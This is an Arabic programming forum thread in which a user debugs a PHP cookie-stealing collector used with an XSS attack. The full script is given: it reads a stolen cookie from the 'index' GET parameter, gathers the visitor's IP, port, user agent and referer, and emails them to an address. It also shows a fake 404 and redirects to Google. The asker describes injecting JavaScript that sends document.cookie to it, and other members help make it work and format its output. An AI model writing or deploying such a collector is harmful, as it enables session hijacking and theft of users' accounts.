اذهب إلى المحتوى
  • 0

كود php لا يعمل سوى على سيرفر محلي، ما المشكلة؟

_Mehdi

السؤال

عندما اضع الكود التالي في php في السيرفر المحلي يتم تنفذ الكود بصورة صحيحة ويطبع كل القيم ولكن عندما ارفع الموقع على استضافة والكود ايضا على استضافة لاينفذ هذا الكود بصورة صحيحة  فيظهر فقط الIP . مالسبب؟

$Msg="IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie";

 

رابط هذا التعليق
شارك على الشبكات الإجتماعية

Recommended Posts

  • 1

اعدادات جهازك تختلف عن الاستضافة افصل بين النص والكود كالتالي

$Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| METHOD: ".$rqst_method. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:".  $cookie;

 

رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0

اخي عندما اضعها بهذه الصورة يكون الناتج كالتالي

IP:37.239.128.15| PORT: | HOST:| Agent: | METHOD: | REF: | DATE{ : } | COOKIE:

ولايطبع كل القيم 

تم التعديل في بواسطة java
رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0
<?php
 $YourMail = "x@hotmail.com"; 
 	if(isset($_GET['index'])){
  	$cookie = $_GET['index'];
	$path = getenv('PATH');
	$date=date ("l dS of F Y h:i:s A"); 
	
    $rem_port = $_SERVER['REMOTE_PORT'];  
	$rem_host = $_SERVER['REMOTE_HOST']; 
	$user_agent = $_SERVER['HTTP_USER_AGENT'];  
	$referer = $_SERVER['HTTP_REFERER'];
	$redirect = "https://www.google.com";
	
 	Echo '<script>document. Location="'. $redirect.'"</script>';
 	}
 	else print '
 	<body bgcolor="000000">
 <center>
 	<b><font color="red">404</font></b><br></center>';
if (getenv('HTTP_X_FORWARDED_FOR')) 
{ 
$ip=getenv('HTTP_X_FORWARDED_FOR'); 
} 
else { 
$ip=getenv('REMOTE_ADDR'); 
}
$Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:".  $cookie;
  	$Send = mail ($YourMail,"cookie",$Msg);
	If ($Send) {
 	if ($redirect <> ""){
 	header("location:".$redirect);
 	}
}

?>

علما ان هذا الكود اعمل عليه في موقع من تصميمي لاختبار ثغرة وليس استخدام خبيث ضد المواقع

رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0

كودك صحيح 

 

المشكله اللي تواجهك 

انت لافتحت الرابط 

file.php

يرسل فقط الايبي على الايميل بسبب الشرط

if(isset($_GET['index']

لو تفتح الرابط مثل كذا 

file.php?index=1

بيرسل كامل المعلومات صحيحه 

 

رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0

انا واضع هذا الكود على استضافة واضع كود جافاسكربت في الموقعي لكي يرسل قيمة الكوكيز لهذا الكود وعندما اضع هذا المتغيرات بهذه الصيغة يرسل المعلومات كاملة ولكن تكون بشكل مكدس بلافواضل انا لاابغي غير ترتيب المعلومات 

$Msg=$cookie.$path.$date.$ip.$rem_port.$rem_host.$user_agent.$referer;

احتاج ان تكون مرتبه كما هي في هذا http://www.go4expert.com/articles/stealing-cookie-xss-t17066/

وشكراجزيلا لك على المساعدة 

تم التعديل في بواسطة java
رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0

عزيزي  انا من شفت الكود عرفت انه   لاستغلال ثغرة Xss  ولذلك تم استخدام المتغير  index 

لكي ترسل القيمة ويتحقق الشرط بحيث يرسل كود جافا سكربت عباره عن document.cookie

 

 لكن لو اردت المعلومات تاتي تحت بعض تستخدم التنسيق html

مثلا <br />

كل وحده بسطر جديد 

$Msg="IP:".$ip."<br />| PORT: ".$rem_port. "<br />| HOST:". $rem_host. "<br />| Agent: ".$user_agent. "<br />| REF: ".$referer."<br />| DATE{ : }". $date." <br />| COOKIE:".  $cookie;

 

رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0

عذرا اخي لم اقصد انك لم تفهم الموضوع ولكن اردت التوضيح اكثر لاني لم افهم اجابتك السابقة  اي فايل تقصد بالضبط هذه  الاجابة 

بتاريخ 44 دقائق مضت قال KSA brg:

و تفتح الرابط مثل كذا 

file.php?index=

وايضا عندما اضع  <br /> ايضا لايتم تنفيذه بشكل صحيح 

شكرا جزيلا لك وعذرا على الاطالة 

رابط هذا التعليق
شارك على الشبكات الإجتماعية

  • 0

انت حفظت الملف باسم معين 

فرضا انك حفظته باسم file.php

 لاجيت تفتحه بالمتصفح 

بيكون كذا 

http://localhost/file.php?index=cookei

طبعا هو الكود مصمم لسحب الكوكيز يستقبل عن طريق المتغير 

لكن للتجربه  لنجاح الكود تضع المتغير اندكس بعد اسم الملف 

تم التعديل في بواسطة KSA brg
رابط هذا التعليق
شارك على الشبكات الإجتماعية

انضم إلى النقاش

يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.

زائر
أجب على هذا السؤال...

×   لقد أضفت محتوى بخط أو تنسيق مختلف.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   جرى استعادة المحتوى السابق..   امسح المحرر

×   You cannot paste images directly. Upload or insert images from URL.

  • إعلانات

  • تابعنا على



×
×
  • أضف...